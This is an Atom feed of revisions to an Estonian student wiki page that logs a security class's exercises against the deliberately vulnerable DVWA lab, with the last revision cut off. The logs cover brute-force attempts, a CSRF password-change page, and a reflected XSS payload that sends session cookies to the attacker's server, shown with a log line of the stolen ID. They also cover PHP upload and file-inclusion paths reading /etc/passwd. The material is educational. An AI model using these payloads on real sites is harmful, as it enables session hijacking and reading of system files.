&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46845</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46845"/>
		<updated>2012-03-28T11:52:08Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Reflected Cross Site Scripting (XSS) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46841</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46841"/>
		<updated>2012-03-28T11:41:30Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Reflected Cross Site Scripting (XSS) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;Xsstesting.jpg&amp;quot;/&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
